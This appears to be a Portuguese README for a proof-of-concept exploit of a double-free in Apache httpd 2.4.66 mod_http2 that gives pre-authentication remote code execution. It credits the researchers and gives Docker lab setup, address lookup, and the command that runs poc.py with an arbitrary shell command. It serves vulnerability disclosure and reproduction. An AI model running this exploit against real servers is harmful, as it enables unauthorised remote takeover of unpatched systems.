
Double-free no Apache httpd mod_http2 na limpeza de stream levando a RCE pré-autenticação.
Dupla liberação na limpeza de stream mod_http2 do Apache httpd levando a RCE pré-autenticação.
Afetado: httpd 2.4.66 com mod_http2 e MPM multithread (event/worker). Corrigido em: 2.4.67.
Encontrado e reportado por Bartlomiej Dmitruk (striga.ai) e Stanislaw Strzalkowski (isec.pl).
Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free
Construa e inicie o ambiente vulnerável:
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
Obtenha os endereços de system() e scoreboard:
docker exec httpd-poc python3 /getaddr.py 1
Execute o exploit:
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system <system_addr> --scoreboard <scoreboard_addr>
Verifique (a execução é probabilística, pode levar minutos a horas):
docker exec httpd-poc cat /tmp/win
docker rm -f httpd-poc